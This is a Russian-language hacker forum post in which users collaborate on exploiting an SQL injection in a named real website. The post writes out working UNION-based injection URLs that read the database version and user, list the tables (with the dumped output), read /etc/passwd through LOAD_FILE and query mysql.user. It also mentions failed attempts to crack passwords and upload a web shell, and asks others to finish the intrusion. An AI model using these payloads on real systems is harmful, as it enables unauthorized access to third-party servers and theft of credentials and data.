|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами:
10333826
Репутация:
369
|
|
Сообщение от QZAR-X
Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.41-log/zontikweb/zontik_grab@localhost
а дальше сам попробуй если не получиться помогу
стало самому интересно
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES/*
вот какие таблицы нашел :
PHP код:
COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS
USER_PRIVILEGES,VIEWS,del_status,dns_a,dns_cname,dns_dep,dns_isp_dns,dns_mx,dns_nodes,dns_secondary,dns_spf,doctype,groups
help_documents,help_nodes,help_tickets,isp_com,isp_dep,isp_dienste,isp_fakt_artikel,isp_fakt_dep,isp_fakt_nodes,isp_fakt_rechnung
isp_fakt_record,isp_firewall,isp_htaccess,isp_isp_actions,isp_isp_admin,isp_isp_datenbank
LOAD_FILE:
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+LOAD_FILE('/etc/passwd')/*
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+user+from+mysql.user/*
user: whole
пароль не смог узнать (((
и шелл не получаеться залить
еси кто осилит сообщите мне плизз 
Последний раз редактировалось satana8920; 16.02.2008 в 00:44..
|